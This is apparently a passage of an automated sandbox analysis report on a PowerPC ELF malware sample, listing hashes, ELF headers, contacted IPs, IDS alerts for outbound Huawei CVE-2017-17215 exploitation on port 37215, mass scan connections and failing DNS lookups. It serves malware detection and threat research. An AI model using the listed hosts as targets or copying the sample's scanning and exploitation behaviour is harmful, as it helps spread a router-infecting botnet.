                  unknownUnited States
                  14061DIGITALOCEAN-ASNUSfalse
                  8.42.101.221
                  unknownUnited States
                  63168TRP-COLORADO-SPRINGSUSfalse
                  69.201.229.5
                  unknownUnited States
                  12271TWC-12271-NYCUSfalse
                  41.112.57.241
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  157.17.51.11
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  157.70.65.174
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  157.23.253.239
                  unknownFrance
                  11251DSTL-2-11251USfalse
                  45.2.81.57
                  unknownCanada
                  7311FRONTIERCAfalse
                  157.61.238.107
                  unknownChina
                  17622CNCGROUP-GZChinaUnicomGuangzhounetworkCNfalse
                  41.37.131.65
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  102.70.113.12
                  unknownMalawi
                  37294TNMMWfalse
                  157.105.123.94
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  44.126.188.18
                  unknownUnited States
                  7377UCSDUSfalse
                  157.215.57.38
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  67.102.93.113
                  unknownUnited States
                  18566MEGAPATH5-USfalse
                  197.90.25.91
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  147.220.248.115
                  unknownSweden
                  34576REGIONSKANE-SEREGIONSKANESEfalse
                  197.254.220.116
                  unknownSudan
                  33788KANARTELSDfalse
                  41.171.231.133
                  unknownSouth Africa
                  36937Neotel-ASZAfalse
                  197.237.196.234
                  unknownKenya
                  15399WANANCHI-KEfalse
                  157.88.4.108
                  unknownSpain
                  766REDIRISRedIRISAutonomousSystemESfalse
                  157.158.112.143
                  unknownPoland
                  8508SILWEB-AS-EDUSILWEBAutonomousSystem-AcademicPLfalse
                  157.141.252.39
                  unknownUnited States
                  27064DNIC-ASBLK-27032-27159USfalse
                  41.184.75.133
                  unknownNigeria
                  29091IPNXngNGfalse
                  41.133.51.96
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  157.145.10.107
                  unknownUnited States
                  719ELISA-ASHelsinkiFinlandEUfalse
                  41.225.189.122
                  unknownTunisia
                  37671GLOBALNET-ASTNfalse
                  157.42.204.199
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  No context
                  No context
                  No context
                  No context
                  No context
                  No created / dropped files found
                  File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                  Entropy (8bit):6.271541719812631
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:VeTv7e9Dcz.elf
                  File size:62996
                  MD5:63ecd0078f4faaf6905fbbc25d6d2d64
                  SHA1:45784cb48d376fda8480e009405fc6f383e9d209
                  SHA256:363ff4d7111088d2f670a7d4da8a3427ca5af8a8459b39366ae279e835977747
                  SHA512:b44287de6279299d0f84ee7f23efcd0c7d806fa50902b0a4a6b845eb85d0e1ac449fbb44c1394c863a425b4419fe00cdca9430396fac2d457ee56fc832d93859
                  SSDEEP:768:SEE5hjcoCkhVRGfRnbmX7/mG1nhG5UmtTy5EMwu/p9OyDQvSFRMNYL6FV+tg6wWA:+5HAdOmGyNtTAdpOyUaFRMNae+aTWp+
                  TLSH:7A534B02B31C0E07D0A31AB0253F5BD197BEEAD022F4F684656F9B9A9675E361181FCD
                  File Content Preview:.ELF...........................4...4.....4. ...(.......................x...x...............|...|...|...l..%t........dt.Q.............................!..|......$H...H..-...$8!. |...N.. .!..|.......?..........\..../...@..\?........+../...A..$8...})......N..

                  ELF header

                  Class:
                  Data:
                  Version:
                  Machine:
                  Version Number:
                  Type:
                  OS/ABI:
                  ABI Version:
                  Entry Point Address:
                  Flags:
                  ELF Header Size:
                  Program Header Offset:
                  Program Header Size:
                  Number of Program Headers:
                  Section Header Offset:
                  Section Header Size:
                  Number of Section Headers:
                  Header String Table Index:
                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .initPROGBITS0x100000940x940x240x00x6AX004
                  .textPROGBITS0x100000b80xb80xd1840x00x6AX004
                  .finiPROGBITS0x1000d23c0xd23c0x200x00x6AX004
                  .rodataPROGBITS0x1000d2600xd2600x1e180x00x2A008
                  .ctorsPROGBITS0x1001f07c0xf07c0x80x00x3WA004
                  .dtorsPROGBITS0x1001f0840xf0840x80x00x3WA004
                  .dataPROGBITS0x1001f0900xf0900x3140x00x3WA008
                  .sdataPROGBITS0x1001f3a40xf3a40x440x00x3WA004
                  .sbssNOBITS0x1001f3e80xf3e80x740x00x3WA004
                  .bssNOBITS0x1001f45c0xf3e80x21940x00x3WA004
                  .shstrtabSTRTAB0x00xf3e80x4b0x00x0001
                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  LOAD0x00x100000000x100000000xf0780xf0786.32100x5R E0x10000.init .text .fini .rodata
                  LOAD0xf07c0x1001f07c0x1001f07c0x36c0x25742.85580x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.2341.232.168.14444248372152835222 03/20/23-17:12:55.092526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4424837215192.168.2.2341.232.168.144
                  192.168.2.23197.246.213.14260578372152835222 03/20/23-17:13:02.227474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6057837215192.168.2.23197.246.213.142
                  192.168.2.2384.7.168.24133778372152835222 03/20/23-17:12:38.593270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377837215192.168.2.2384.7.168.241
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 20, 2023 17:12:30.081583977 CET42836443192.168.2.2391.189.91.43
                  Mar 20, 2023 17:12:30.593539953 CET4251680192.168.2.23109.202.202.202
                  Mar 20, 2023 17:12:32.497987032 CET1141137215192.168.2.23180.228.5.193
                  Mar 20, 2023 17:12:32.498035908 CET1141137215192.168.2.23168.56.24.160
                  Mar 20, 2023 17:12:32.498059988 CET1141137215192.168.2.2341.19.106.192
                  Mar 20, 2023 17:12:32.498092890 CET1141137215192.168.2.23157.76.13.125
                  Mar 20, 2023 17:12:32.498119116 CET1141137215192.168.2.23197.76.63.81
                  Mar 20, 2023 17:12:32.498140097 CET1141137215192.168.2.23157.116.170.66
                  Mar 20, 2023 17:12:32.498162985 CET1141137215192.168.2.23157.110.179.175
                  Mar 20, 2023 17:12:32.498171091 CET1141137215192.168.2.2334.123.68.242
                  Mar 20, 2023 17:12:32.498187065 CET1141137215192.168.2.2341.122.134.149
                  Mar 20, 2023 17:12:32.498213053 CET1141137215192.168.2.23157.11.11.112
                  Mar 20, 2023 17:12:32.498240948 CET1141137215192.168.2.23157.61.197.161
                  Mar 20, 2023 17:12:32.498244047 CET1141137215192.168.2.2341.152.161.195
                  Mar 20, 2023 17:12:32.498264074 CET1141137215192.168.2.23157.163.141.191
                  Mar 20, 2023 17:12:32.498281002 CET1141137215192.168.2.2341.9.82.44
                  Mar 20, 2023 17:12:32.498296022 CET1141137215192.168.2.2341.81.86.9
                  Mar 20, 2023 17:12:32.498317957 CET1141137215192.168.2.23138.169.157.4
                  Mar 20, 2023 17:12:32.498339891 CET1141137215192.168.2.23197.164.110.84
                  Mar 20, 2023 17:12:32.498363018 CET1141137215192.168.2.23197.198.39.74
                  Mar 20, 2023 17:12:32.498382092 CET1141137215192.168.2.23157.53.253.208
                  Mar 20, 2023 17:12:32.498403072 CET1141137215192.168.2.23157.189.2.194
                  Mar 20, 2023 17:12:32.498429060 CET1141137215192.168.2.23157.180.105.74
                  Mar 20, 2023 17:12:32.498445988 CET1141137215192.168.2.23197.27.87.144
                  Mar 20, 2023 17:12:32.498471975 CET1141137215192.168.2.23157.174.157.72
                  Mar 20, 2023 17:12:32.498490095 CET1141137215192.168.2.23157.250.35.149
                  Mar 20, 2023 17:12:32.498509884 CET1141137215192.168.2.23157.231.16.85
                  Mar 20, 2023 17:12:32.498528004 CET1141137215192.168.2.23197.148.37.251
                  Mar 20, 2023 17:12:32.498548031 CET1141137215192.168.2.23157.230.151.178
                  Mar 20, 2023 17:12:32.498569965 CET1141137215192.168.2.23157.187.146.16
                  Mar 20, 2023 17:12:32.498599052 CET1141137215192.168.2.23119.166.35.125
                  Mar 20, 2023 17:12:32.498616934 CET1141137215192.168.2.23157.87.60.173
                  Mar 20, 2023 17:12:32.498624086 CET1141137215192.168.2.23197.217.204.246
                  Mar 20, 2023 17:12:32.498636961 CET1141137215192.168.2.23157.222.172.203
                  Mar 20, 2023 17:12:32.498656034 CET1141137215192.168.2.23157.31.178.119
                  Mar 20, 2023 17:12:32.498672962 CET1141137215192.168.2.23157.115.99.130
                  Mar 20, 2023 17:12:32.498702049 CET1141137215192.168.2.2341.13.223.106
                  Mar 20, 2023 17:12:32.498712063 CET1141137215192.168.2.23143.105.138.206
                  Mar 20, 2023 17:12:32.498737097 CET1141137215192.168.2.2332.60.204.58
                  Mar 20, 2023 17:12:32.498759031 CET1141137215192.168.2.2341.69.39.242
                  Mar 20, 2023 17:12:32.498796940 CET1141137215192.168.2.23197.121.213.18
                  Mar 20, 2023 17:12:32.498815060 CET1141137215192.168.2.23157.247.80.52
                  Mar 20, 2023 17:12:32.498831987 CET1141137215192.168.2.2341.174.171.134
                  Mar 20, 2023 17:12:32.498862028 CET1141137215192.168.2.23148.187.75.112
                  Mar 20, 2023 17:12:32.498898029 CET1141137215192.168.2.23157.148.62.25
                  Mar 20, 2023 17:12:32.498933077 CET1141137215192.168.2.23157.119.248.58
                  Mar 20, 2023 17:12:32.498945951 CET1141137215192.168.2.23197.136.47.101
                  Mar 20, 2023 17:12:32.498960972 CET1141137215192.168.2.23197.89.58.77
                  Mar 20, 2023 17:12:32.498979092 CET1141137215192.168.2.23197.254.87.253
                  Mar 20, 2023 17:12:32.499001026 CET1141137215192.168.2.2341.128.204.82
                  Mar 20, 2023 17:12:32.499020100 CET1141137215192.168.2.23157.176.123.57
                  Mar 20, 2023 17:12:32.499037981 CET1141137215192.168.2.23157.138.24.78
                  Mar 20, 2023 17:12:32.499053001 CET1141137215192.168.2.23197.194.198.175
                  Mar 20, 2023 17:12:32.499074936 CET1141137215192.168.2.2341.80.247.235
                  Mar 20, 2023 17:12:32.499094963 CET1141137215192.168.2.2341.66.163.127
                  Mar 20, 2023 17:12:32.499109983 CET1141137215192.168.2.234.248.192.101
                  Mar 20, 2023 17:12:32.499129057 CET1141137215192.168.2.23197.35.40.154
                  Mar 20, 2023 17:12:32.499156952 CET1141137215192.168.2.23197.38.10.141
                  Mar 20, 2023 17:12:32.499181032 CET1141137215192.168.2.23157.154.85.22
                  Mar 20, 2023 17:12:32.499200106 CET1141137215192.168.2.23197.100.32.124
                  Mar 20, 2023 17:12:32.499222040 CET1141137215192.168.2.23157.17.250.36
                  Mar 20, 2023 17:12:32.499243975 CET1141137215192.168.2.23151.153.7.204
                  Mar 20, 2023 17:12:32.499259949 CET1141137215192.168.2.23197.236.97.90
                  Mar 20, 2023 17:12:32.499280930 CET1141137215192.168.2.23157.183.179.103
                  Mar 20, 2023 17:12:32.499314070 CET1141137215192.168.2.2389.172.6.51
                  Mar 20, 2023 17:12:32.499330997 CET1141137215192.168.2.23197.186.119.105
                  Mar 20, 2023 17:12:32.499361038 CET1141137215192.168.2.23157.200.205.90
                  Mar 20, 2023 17:12:32.499375105 CET1141137215192.168.2.2341.90.200.218
                  Mar 20, 2023 17:12:32.499391079 CET1141137215192.168.2.23157.105.69.15
                  Mar 20, 2023 17:12:32.499412060 CET1141137215192.168.2.23193.243.220.186
                  Mar 20, 2023 17:12:32.499437094 CET1141137215192.168.2.23157.21.142.72
                  Mar 20, 2023 17:12:32.499450922 CET1141137215192.168.2.23197.81.78.27
                  Mar 20, 2023 17:12:32.499469995 CET1141137215192.168.2.23173.73.96.10
                  Mar 20, 2023 17:12:32.499485970 CET1141137215192.168.2.23157.112.254.26
                  Mar 20, 2023 17:12:32.499504089 CET1141137215192.168.2.23182.104.117.110
                  Mar 20, 2023 17:12:32.499528885 CET1141137215192.168.2.2341.218.216.248
                  Mar 20, 2023 17:12:32.499537945 CET1141137215192.168.2.23153.201.56.140
                  Mar 20, 2023 17:12:32.499556065 CET1141137215192.168.2.23157.86.69.76
                  Mar 20, 2023 17:12:32.499572992 CET1141137215192.168.2.2341.242.198.230
                  Mar 20, 2023 17:12:32.499591112 CET1141137215192.168.2.232.15.154.178
                  Mar 20, 2023 17:12:32.499619007 CET1141137215192.168.2.23157.91.158.72
                  Mar 20, 2023 17:12:32.499633074 CET1141137215192.168.2.23197.247.48.28
                  Mar 20, 2023 17:12:32.499651909 CET1141137215192.168.2.23157.130.51.218
                  Mar 20, 2023 17:12:32.499670982 CET1141137215192.168.2.23157.80.4.216
                  Mar 20, 2023 17:12:32.499686003 CET1141137215192.168.2.23157.146.210.93
                  Mar 20, 2023 17:12:32.499710083 CET1141137215192.168.2.23197.57.32.183
                  Mar 20, 2023 17:12:32.499730110 CET1141137215192.168.2.2367.29.55.35
                  Mar 20, 2023 17:12:32.499747038 CET1141137215192.168.2.2341.77.55.159
                  Mar 20, 2023 17:12:32.499766111 CET1141137215192.168.2.2341.11.209.169
                  Mar 20, 2023 17:12:32.499784946 CET1141137215192.168.2.23157.52.188.234
                  Mar 20, 2023 17:12:32.499803066 CET1141137215192.168.2.2341.220.42.43
                  Mar 20, 2023 17:12:32.499824047 CET1141137215192.168.2.2341.77.191.111
                  Mar 20, 2023 17:12:32.499845028 CET1141137215192.168.2.23197.90.51.104
                  Mar 20, 2023 17:12:32.499861002 CET1141137215192.168.2.2341.157.128.114
                  Mar 20, 2023 17:12:32.499878883 CET1141137215192.168.2.2341.106.158.37
                  Mar 20, 2023 17:12:32.499896049 CET1141137215192.168.2.2341.25.216.65
                  Mar 20, 2023 17:12:32.499912024 CET1141137215192.168.2.23157.232.149.226
                  Mar 20, 2023 17:12:32.499936104 CET1141137215192.168.2.2341.8.42.2
                  Mar 20, 2023 17:12:32.499958992 CET1141137215192.168.2.23157.128.61.170
                  Mar 20, 2023 17:12:32.499983072 CET1141137215192.168.2.23157.164.71.56
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 20, 2023 17:12:32.492122889 CET192.168.2.238.8.8.80x6162Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:32.517299891 CET192.168.2.238.8.8.80x6162Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:32.537633896 CET192.168.2.238.8.8.80x6162Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:32.557524920 CET192.168.2.238.8.8.80x6162Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:32.575745106 CET192.168.2.238.8.8.80x6162Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:39.600483894 CET192.168.2.238.8.8.80xc1fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:39.622463942 CET192.168.2.238.8.8.80xc1fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:39.641073942 CET192.168.2.238.8.8.80xc1fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:39.662622929 CET192.168.2.238.8.8.80xc1fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:39.683422089 CET192.168.2.238.8.8.80xc1fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:49.704005957 CET192.168.2.238.8.8.80x554dStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:49.722170115 CET192.168.2.238.8.8.80x554dStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:49.742053986 CET192.168.2.238.8.8.80x554dStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:49.762362003 CET192.168.2.238.8.8.80x554dStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:49.780390024 CET192.168.2.238.8.8.80x554dStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:58.800568104 CET192.168.2.238.8.8.80xf9e6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:58.820017099 CET192.168.2.238.8.8.80xf9e6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:58.840202093 CET192.168.2.238.8.8.80xf9e6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:58.860093117 CET192.168.2.238.8.8.80xf9e6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:58.886013031 CET192.168.2.238.8.8.80xf9e6Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:00.904612064 CET192.168.2.238.8.8.80xdd9aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:00.924596071 CET192.168.2.238.8.8.80xdd9aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:00.944766045 CET192.168.2.238.8.8.80xdd9aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:00.964998960 CET192.168.2.238.8.8.80xdd9aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:00.984601021 CET192.168.2.238.8.8.80xdd9aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:11.004483938 CET192.168.2.238.8.8.80x52bStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:11.027167082 CET192.168.2.238.8.8.80x52bStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:11.045247078 CET192.168.2.238.8.8.80x52bStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:11.063252926 CET192.168.2.238.8.8.80x52bStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:11.081378937 CET192.168.2.238.8.8.80x52bStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:16.099610090 CET192.168.2.238.8.8.80xb14aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:16.119885921 CET192.168.2.238.8.8.80xb14aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:16.138309002 CET192.168.2.238.8.8.80xb14aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:16.155997992 CET192.168.2.238.8.8.80xb14aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:16.174251080 CET192.168.2.238.8.8.80xb14aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:22.192508936 CET192.168.2.238.8.8.80x6156Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:22.210782051 CET192.168.2.238.8.8.80x6156Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:22.230757952 CET192.168.2.238.8.8.80x6156Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:22.249365091 CET192.168.2.238.8.8.80x6156Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:22.269886017 CET192.168.2.238.8.8.80x6156Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:24.288551092 CET192.168.2.238.8.8.80x3ad3Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:24.306853056 CET192.168.2.238.8.8.80x3ad3Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:24.327182055 CET192.168.2.238.8.8.80x3ad3Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:24.346571922 CET192.168.2.238.8.8.80x3ad3Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:24.365061998 CET192.168.2.238.8.8.80x3ad3Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:26.385014057 CET192.168.2.238.8.8.80xf22cStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:26.403367996 CET192.168.2.238.8.8.80xf22cStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:26.423146009 CET192.168.2.238.8.8.80xf22cStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:26.441109896 CET192.168.2.238.8.8.80xf22cStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:26.461011887 CET192.168.2.238.8.8.80xf22cStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:32.480617046 CET192.168.2.238.8.8.80x9199Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:32.500961065 CET192.168.2.238.8.8.80x9199Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:32.520802021 CET192.168.2.238.8.8.80x9199Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:32.539278030 CET192.168.2.238.8.8.80x9199Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:32.559184074 CET192.168.2.238.8.8.80x9199Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:37.577591896 CET192.168.2.238.8.8.80x5ffStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:37.598490000 CET192.168.2.238.8.8.80x5ffStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:37.619050026 CET192.168.2.238.8.8.80x5ffStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:37.642474890 CET192.168.2.238.8.8.80x5ffStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:37.662600994 CET192.168.2.238.8.8.80x5ffStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:42.680840015 CET192.168.2.238.8.8.80x4f3dStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:42.700831890 CET192.168.2.238.8.8.80x4f3dStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:42.718713999 CET192.168.2.238.8.8.80x4f3dStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:42.738929987 CET192.168.2.238.8.8.80x4f3dStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:42.756850958 CET192.168.2.238.8.8.80x4f3dStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:52.776473999 CET192.168.2.238.8.8.80x3963Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:52.796468973 CET192.168.2.238.8.8.80x3963Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:52.814531088 CET192.168.2.238.8.8.80x3963Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:52.832792044 CET192.168.2.238.8.8.80x3963Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:52.851162910 CET192.168.2.238.8.8.80x3963Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:01.871340036 CET192.168.2.238.8.8.80x8cc2Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:01.892065048 CET192.168.2.238.8.8.80x8cc2Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:01.910787106 CET192.168.2.238.8.8.80x8cc2Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:01.931792021 CET192.168.2.238.8.8.80x8cc2Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:01.952481031 CET192.168.2.238.8.8.80x8cc2Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:08.972430944 CET192.168.2.238.8.8.80x643fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:08.990817070 CET192.168.2.238.8.8.80x643fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:09.009038925 CET192.168.2.238.8.8.80x643fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:09.030524969 CET192.168.2.238.8.8.80x643fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:09.051043034 CET192.168.2.238.8.8.80x643fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:18.069339037 CET192.168.2.238.8.8.80xa1d0Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:18.090115070 CET192.168.2.238.8.8.80xa1d0Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:18.108059883 CET192.168.2.238.8.8.80xa1d0Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:18.128057003 CET192.168.2.238.8.8.80xa1d0Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:18.145721912 CET192.168.2.238.8.8.80xa1d0Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:27.165184021 CET192.168.2.238.8.8.80x186fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:27.183620930 CET192.168.2.238.8.8.80x186fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:27.203716040 CET192.168.2.238.8.8.80x186fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:27.221940041 CET192.168.2.238.8.8.80x186fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:27.240173101 CET192.168.2.238.8.8.80x186fStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:29.260246038 CET192.168.2.238.8.8.80x8d17Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:29.279043913 CET192.168.2.238.8.8.80x8d17Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:29.299376011 CET192.168.2.238.8.8.80x8d17Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:29.319619894 CET192.168.2.238.8.8.80x8d17Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:29.339847088 CET192.168.2.238.8.8.80x8d17Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:30.358474016 CET192.168.2.238.8.8.80x7a2eStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:30.376990080 CET192.168.2.238.8.8.80x7a2eStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:30.395179987 CET192.168.2.238.8.8.80x7a2eStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:30.413711071 CET192.168.2.238.8.8.80x7a2eStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:30.432341099 CET192.168.2.238.8.8.80x7a2eStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 20, 2023 17:12:32.516231060 CET8.8.8.8192.168.2.230x6162Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:32.537130117 CET8.8.8.8192.168.2.230x6162Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:32.557233095 CET8.8.8.8192.168.2.230x6162Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:32.575474024 CET8.8.8.8192.168.2.230x6162Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:32.599232912 CET8.8.8.8192.168.2.230x6162Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:39.622071028 CET8.8.8.8192.168.2.230xc1fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:39.640789032 CET8.8.8.8192.168.2.230xc1fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:39.662328005 CET8.8.8.8192.168.2.230xc1fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
